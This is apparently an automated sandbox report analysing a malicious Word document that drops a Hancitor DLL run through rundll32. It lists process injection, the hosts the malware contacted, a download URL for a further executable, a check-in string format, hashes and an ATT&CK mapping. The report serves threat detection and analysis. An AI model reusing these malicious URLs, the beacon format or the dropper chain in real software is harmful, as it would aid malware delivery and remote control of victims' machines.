              Source: 3.2.rundll32.exe.c0174.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: rundll32.exe, 00000002.00000002.3150687914.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3150833774.0000000001BF0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
              Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@5/12@174/4
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00186E8A GetDiskFreeSpaceA,3_2_00186E8A
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001917A0 FindResourceA,LoadResource,SizeofResource,LockResource,3_2_001917A0
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$27_5079687843613.doc
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRAFFD.tmp
              Source: 0427_5079687843613.docOLE indicator, Word Document stream: true
              Source: 0427_5079687843613.docOLE document summary: title field not present or empty
              Source: 0427_5079687843613.docOLE document summary: edited time not present or 0
              Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.ini
              Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\word\ferus.dll,YYUNXEGQRYS
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\word\ferus.dll,YYUNXEGQRYS
              Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001C3580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,3_2_001C3580
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Temp\furmt.f
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\rundll32.exe, Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\rundll32.exe, Process information set: NOOPENFILEERRORBOX
              Source: 0427_5079687843613.doc, Stream path 'Data' entropy: 7.97255502805 (max. 8.0)
              Source: C:\Windows\SysWOW64\rundll32.exe, Window / User API: threadDelayed 390
              Source: C:\Windows\SysWOW64\rundll32.exe, Window / User API: threadDelayed 392
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\furmt.f
              Source: C:\Windows\SysWOW64\rundll32.exe, Check user administrative privileges: GetTokenInformation,DecisionNodes, graph_3-12308
              Source: C:\Windows\SysWOW64\rundll32.exe, Last function: Thread delayed
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_0018487C GetModuleHandleA,7248FFF6,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_0018487C
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_001C3400 GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,3_2_001C3400
              Source: C:\Windows\SysWOW64\rundll32.exe, Thread delayed: delay time: 60000
              Source: C:\Windows\SysWOW64\rundll32.exe, API call chain: ExitProcess graph end node, graph_3-12549
              Source: C:\Windows\SysWOW64\rundll32.exe, API call chain: ExitProcess graph end node, graph_3-12564
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_001C3580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,3_2_001C3580
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_001C1390 GetProcessHeap,RtlAllocateHeap,3_2_001C1390
              Source: C:\Windows\SysWOW64\rundll32.exe, Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

              HIPS / PFW / Operating System Protection Evasion:

              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: gru77.ru
              Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: watiounds.ru
              Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 95.47.161.162 80
              Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 50.16.249.42 80
              Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: api.ipify.org
              Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: caperesto.com
              Contains functionality to inject threads in other processes
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_001C3880 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle,3_2_001C3880
              Source: C:\Windows\System32\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\word\ferus.dll,YYUNXEGQRYS
              Source: rundll32.exe, 00000002.00000002.3150654116.00000000006A0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3150805208.00000000007F0000.00000002.00000001.sdmp, Binary or memory string: Program Manager
              Source: rundll32.exe, 00000002.00000002.3150654116.00000000006A0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3150805208.00000000007F0000.00000002.00000001.sdmp, Binary or memory string: Shell_TrayWnd
              Source: rundll32.exe, 00000002.00000002.3150654116.00000000006A0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3150805208.00000000007F0000.00000002.00000001.sdmp, Binary or memory string: !Progman
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_00184A34
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: GetLocaleInfoA,GetACP,3_2_0018A9A0
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: GetLocaleInfoA,3_2_001852F0
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: GetLocaleInfoA,3_2_001852EE
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_00184B40
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: GetLocaleInfoA,3_2_0018954C
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: GetLocaleInfoA,3_2_00189598
              Source: C:\Windows\SysWOW64\rundll32.exe, Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_0018804C GetLocalTime,3_2_0018804C
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_00192358 GetUserNameA,GetUserNameA,GetEnhMetaFileA,GetEnhMetaFileA,VirtualAllocEx,LoadCursorA,DeleteObject,DeleteObject,AddFontResourceW (repeated),LoadCursorA (repeated),AddFontResourceW (repeated),3_2_00192358
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_001C1AA0 GetVersion,wsprintfA,wsprintfA,3_2_001C1AA0

              Remote Access Functionality:

              Yara detected Hancitor
              Source: Yara match, File source: 00000003.00000002.3150581095.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000002.3150667690.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 2504, type: MEMORY
              Source: Yara match, File source: 3.2.rundll32.exe.1c0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 3.2.rundll32.exe.1b0000.2.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 3.2.rundll32.exe.1c0000.3.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 3.2.rundll32.exe.1b0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 3.2.rundll32.exe.c0174.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 3.2.rundll32.exe.c0174.0.raw.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts | Scripting 22 | Path Interception | Process Injection 212 | Disable or Modify Tools 11 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
              Default Accounts | Native API 2 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Deobfuscate/Decode Files or Information 1 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Encrypted Channel 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
              Domain Accounts | Exploitation for Client Execution 23 | Logon Script (Windows) | Logon Script (Windows) | Scripting 22 | Security Account Manager | File and Directory Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 21 | NTDS | System Information Discovery 26 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 113 | SIM Card Swap | | Carrier Billing Fraud
              Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 1 | LSA Secrets | Security Software Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
              Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 11 | Cached Domain Credentials | Process Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
              External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 1 | DCSync | Virtualization/Sandbox Evasion 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
              Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 212 | Proc Filesystem | Application Window Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
              Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Rundll32 1 | /etc/passwd and /etc/shadow | System Owner/User Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
              Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | Remote System Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
              Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | System Network Configuration Discovery 1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              Source | Detection | Scanner | Label
              C:\Users\user\AppData\Local\Temp\furmt.f | 100% | Joe Sandbox ML |

              Unpacked PE Files

              Source | Detection | Scanner | Label
              3.2.rundll32.exe.1c0000.3.unpack | 100% | Avira | TR/Hijacker.Gen
              3.2.rundll32.exe.180000.1.unpack | 100% | Avira | HEUR/AGEN.1108767
              3.2.rundll32.exe.c0174.0.unpack | 100% | Avira | TR/Kazy.4159236

              Domains

              No Antivirus matches

              URLs

              Source | Detection | Scanner | Label
              http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
              http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID | 0% | Avira URL Cloud | safe
              http://thuniopme.ru/8/forum.php | 0% | Avira URL Cloud | safe
              http://www.%s.comPA | 0% | URL Reputation | safe
              http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
              http://caperesto.com/8/forum.php | 0% | Avira URL Cloud | safe
              http://gru77.ru/6fdsg45ehdf.exe.ru/6fdsg45ehdf.exe99 | 0% | Avira URL Cloud | safe
              http://watiounds.ru/8/forum.php | 0% | Avira URL Cloud | safe
              http://gru77.ru/6fdsg45ehdf.exe | 100% | Avira URL Cloud | malware

              Domains and IPs

              Contacted Domains

              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              elb097307-934924932.us-east-1.elb.amazonaws.com | 107.22.233.72 | true | false | | high
              watiounds.ru | 95.47.161.162 | true | true | | unknown
              gru77.ru | unknown | unknown | true | | unknown
              api.ipify.org | unknown | unknown | false | | high
              caperesto.com | unknown | unknown | true | | unknown

              Contacted URLs

              Name | Malicious | Antivirus Detection | Reputation
              http://thuniopme.ru/8/forum.php | true | Avira URL Cloud: safe | unknown
              http://api.ipify.org/ | false | | high
              http://caperesto.com/8/forum.php | true | Avira URL Cloud: safe | unknown
              http://watiounds.ru/8/forum.php | true | Avira URL Cloud: safe | unknown

              URLs from Memory and Binaries

              Name | Source | Malicious | Antivirus Detection | Reputation
              http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | rundll32.exe, 00000002.00000002.3150904427.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3151008908.0000000001DD7000.00000002.00000001.sdmp | false | | high
              http://www.windows.com/pctv. | rundll32.exe, 00000003.00000002.3150833774.0000000001BF0000.00000002.00000001.sdmp | false | | high
              http://investor.msn.com | rundll32.exe, 00000002.00000002.3150687914.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3150833774.0000000001BF0000.00000002.00000001.sdmp | false | | high
              http://www.msnbc.com/news/ticker.txt | rundll32.exe, 00000002.00000002.3150687914.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3150833774.0000000001BF0000.00000002.00000001.sdmp | false | | high
              http://www.icra.org/vocabulary/. | rundll32.exe, 00000002.00000002.3150904427.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3151008908.0000000001DD7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | rundll32.exe, 00000003.00000002.3151836031.0000000003290000.00000002.00000001.sdmp | false | | high
              http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID | rundll32.exe, 00000003.00000002.3150581095.00000000000C0000.00000040.00000001.sdmp, rundll32.exe, 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp | false | Avira URL Cloud: safe | low
              http://investor.msn.com/ | rundll32.exe, 00000002.00000002.3150687914.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3150833774.0000000001BF0000.00000002.00000001.sdmp | false | | high
              http://www.%s.comPA | rundll32.exe, 00000003.00000002.3151836031.0000000003290000.00000002.00000001.sdmp | false | URL Reputation: safe | low
              http://windowsmedia.com/redir/services.asp?WMPFriendly=true | rundll32.exe, 00000002.00000002.3150904427.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3151008908.0000000001DD7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
              http://www.hotmail.com/oe | rundll32.exe, 00000002.00000002.3150687914.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3150833774.0000000001BF0000.00000002.00000001.sdmp | false | | high
              http://gru77.ru/6fdsg45ehdf.exe.ru/6fdsg45ehdf.exe99 | rundll32.exe, 00000003.00000002.3150687210.00000000002BA000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
              http://gru77.ru/6fdsg45ehdf.exe | rundll32.exe, 00000003.00000003.2806499777.0000000000404000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.3150687210.00000000002BA000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
              http://api.ipify.org | rundll32.exe | false | | high

                                          Contacted IPs


                                          Public

                                          IP | Domain | Country | ASN | ASN Name | Malicious
                                          50.16.249.42 | unknown | United States | 14618 | AMAZON-AESUS | true
                                          95.47.161.162 | watiounds.ru | Czech Republic | 12722 | RECONNRU | true

                                          Private

                                          IP
                                          192.168.2.22
                                          192.168.2.255

                                          General Information

                                          Joe Sandbox Version:32.0.0 Black Diamond
                                          Analysis ID:399782
                                          Start date:29.04.2021
                                          Start time:08:15:13
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 12m 15s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Sample file name:0427_5079687843613.doc
                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                          Number of analysed new started processes analysed:6
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • GSI enabled (VBA)
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.expl.evad.winDOC@5/12@174/4
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HDC Information:
                                          • Successful, ratio: 48.4% (good quality ratio 47.6%)
                                          • Quality average: 86.4%
                                          • Quality standard deviation: 22.7%
                                          HCA Information:
                                          • Successful, ratio: 79%
                                          • Number of executed functions: 31
                                          • Number of non-executed functions: 36
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .doc
                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                          • Attach to Office via COM
                                          • Scroll down
                                          • Close Viewer
                                          Warnings:
                                          • Report size getting too big, too many NtCreateFile calls found.
                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                          Simulations

                                          Behavior and APIs

                                          Time | Type | Description
                                          08:15:42 | API Interceptor | 4258x Sleep call for process: rundll32.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          Match | Associated Sample Name / URL | Detection | Context
                                          50.16.249.42 | vVNILsHyqm.exe | malicious | api.ipify.org/?format=xml
                                          95.47.161.162 | jers.dll | malicious | sumbahas.com/8/forum.php

                                          Domains


                                          ASN


                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C3976C00.emf
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                          Category:dropped
                                          Size (bytes):4976
                                          Entropy (8bit):3.358345176057016
                                          Encrypted:false
                                          SSDEEP:48:0KN0w3l/sdBg6qjpLkwOEG6kpnydHkba1K2:H0WlqBFq9gV+EM
                                          MD5:36E0C18DFD69607FA569CA25188D41FB
                                          SHA1:294C249AA6494505041658E844C2A9EDA3057F43
                                          SHA-256:87E59228E4803C61117349C76001B1C5C2F852C9185AA3FAA3A2864E5FFD15AF
                                          SHA-512:A6237FEFD6D570C74DB5DC108A5F732A8413980634CCCB92FE822568B4F4D890A738DBDB35368A36F24A85151C2E7A4A943351444A0100C551A63FFB342F3629
                                          Malicious:false
                                          Reputation:low
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1BC642F3-025D-4403-9DBE-B492A11253DC}.tmp
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1024
                                          Entropy (8bit):0.05390218305374581
                                          Encrypted:false
                                          SSDEEP:3:ol3lYdn:4Wn
                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          C:\Users\user\AppData\Local\Temp\furmt.f
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):245760
                                          Entropy (8bit):6.820832542888292
                                          Encrypted:false
                                          SSDEEP:3072:mojtg6jca6iMdxkpYQcqIxLuuwhb0NETyLsrq9QDLWNHKqxgojtg6jca6iMdxkpA:mQinIRGLgDUgQinIRGLgDU
                                          MD5:3919D906E5C9E96B346DFC8FFD191C7A
                                          SHA1:21264A9C28F57A619EB0A11145FEB5AA0442A278
                                          SHA-256:47F6A6E063F5DB45441A013C7AC43526CF66A7427BC06FD3A44E7305C8D89675
                                          SHA-512:1158945FB4E9A44198547C9284F3855141EDB99D5C6FBBBD13F119782C32E3BACAD4B253C0DDFE2CE4C22A62D4C95CE72F81219146253153CB6A8767293A2765
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          Reputation:low
                                          C:\Users\user\AppData\Local\Temp\furmt.f:Zone.Identifier
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):52
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:gAWY3+/lAWY3n:qY3ARY3n
                                          MD5:7751FFC449B1D4B0F6D5064106C31B47
                                          SHA1:1A197DC9CC9FE08CFCEA7BF65FFA456DC6478837
                                          SHA-256:959E79C6EA7DB2EB3018A564871D460A33918715CF472E3A107FBFFC4B79FF36
                                          SHA-512:25D256CAF779B4FCB07ABB5047C4E5BAA2D271641ACB5FBE7CF7529320ED08FD62D981B29D7E49E431ECE510884567D236EF91445DFEE3514147C2863288AAEC
                                          Malicious:true
                                          Reputation:moderate, very likely benign file
                                          Preview: [ZoneTransfer]..ZoneId=3..[ZoneTransfer]..ZoneId=3..
                                          C:\Users\user\AppData\Local\Temp\msohtmlclip1\01\clip_colorschememapping.xml
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):314
                                          Entropy (8bit):4.803822695545621
                                          Encrypted:false
                                          SSDEEP:6:TMVBd6OjzVlNAUifYRZ5YUvLGDmaN4bJU6Yizg:TMHdtnGfYF/CSaibJUzf
                                          MD5:6B7A472A22FBDBFF4B2B08DDB4F43735
                                          SHA1:C6DF700168D3F5A90FF2713B78F8EF1446927102
                                          SHA-256:65F3CDBC4390C81B94FA960B7362917443FC1E6A51E3F81E4CB4C4DFA09DA4BE
                                          SHA-512:8D2E00954422F124CB1A7B969A728B3A6C9FB11C44623C1CDA33F2364E1C7CB101F6BF6C980E5F26368594F6CECED5C3D5E5A43327387554567BCDB5F1036740
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
                                          C:\Users\user\AppData\Local\Temp\msohtmlclip1\01\clip_image001.emz
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:gzip compressed data, max speed, from NTFS filesystem (NT)
                                          Category:modified
                                          Size (bytes):1215
                                          Entropy (8bit):7.720667879986562
                                          Encrypted:false
                                          SSDEEP:24:XC4nYSlgocPZuf07iaNOhRWR13JF/KAeSews/cidptM231HFZj08qR:XC4n3Go+Zumixa3JF/Kht/Rv5FZoh
                                          MD5:65AA45B1D2277144B80835615274A8EF
                                          SHA1:EDF5C95DC83A9AD19CAC33F76FEA0E65C87A7A62
                                          SHA-256:735F39F2AA363FB22BA36E411E63F522608F7180E6AB92E307378AB0ECB93770
                                          SHA-512:2E75733EAAAF96A8104F7C18C114DB0A993DBCEDF370763CB4AB64A15284389E0907C0AE3313DE1DBFD1CA645E2271DC59F7181D25B6C217AF814A7643BEF1B9
                                          Malicious:false
                                          Reputation:low
                                          C:\Users\user\AppData\Local\Temp\msohtmlclip1\01\clip_themedata.thmx
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:Microsoft OOXML
                                          Category:dropped
                                          Size (bytes):3104
                                          Entropy (8bit):7.632416686567842
                                          Encrypted:false
                                          SSDEEP:96:Q6Zjp6bfuijKIDa05vZep862Q9NAjCbxFpgNum:Q6/6rT5bk8xgNAORm
                                          MD5:2B26E4DD316F857EBB6E2B6B0E1E0282
                                          SHA1:581AE91D57A710CF31348CD5F5AB6FD1B081291E
                                          SHA-256:40BB5B5897D76A8EEFB7136E658BDDAA65F094C9689B931A78A01601F9EE02CB
                                          SHA-512:F097BEEC6E9E39E56DD1AF7DD1E02FE87DA3F818006E5B8B9377013E6FD039EE5765B3BDD7FBF96529C9988E2D7A75EA7300C7CA292DB9471ACE450E7582D0A0
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\0427_5079687843613.LNK
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Thu Apr 29 14:15:29 2021, length=784384, window=hide
                                          Category:dropped
                                          Size (bytes):2108
                                          Entropy (8bit):4.503658357646499
                                          Encrypted:false
                                          SSDEEP:48:8qmu/XT3IkI0j+ZqQh2qmu/XT3IkI0j+ZqQ/:8qd/XLIkIbqQh2qd/XLIkIbqQ/
                                          MD5:53ECA5248AE0C970EDFD7E37B054874D
                                          SHA1:901118A1CE23DB752D663C5204AE794B98E5D2B6
                                          SHA-256:ABF9B2606A5C55348D739971EE3A49A8A1CD2D06B42D3F9238E7B0C1566FB1D6
                                          SHA-512:A3DEE5796BD84B186A73CC02741E6594DFB7E10C5C6F92BA27361D5E6A9E2B172CCA9DA1E91A0C0166E256FD3045A2CA349F95104A91FECC305ACEC97914F24E
                                          Malicious:false
                                          Reputation:low
                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):92
                                          Entropy (8bit):4.3511064559072565
                                          Encrypted:false
                                          SSDEEP:3:M1VxJc0aTUMUlm0c0aTUMUlmX1VxJc0aTUMUlv:MJgzVzngz2
                                          MD5:7497C022A033D089796E8BCD0B7836E9
                                          SHA1:0188364DB33880EEEB5797EBB521424E205A931B
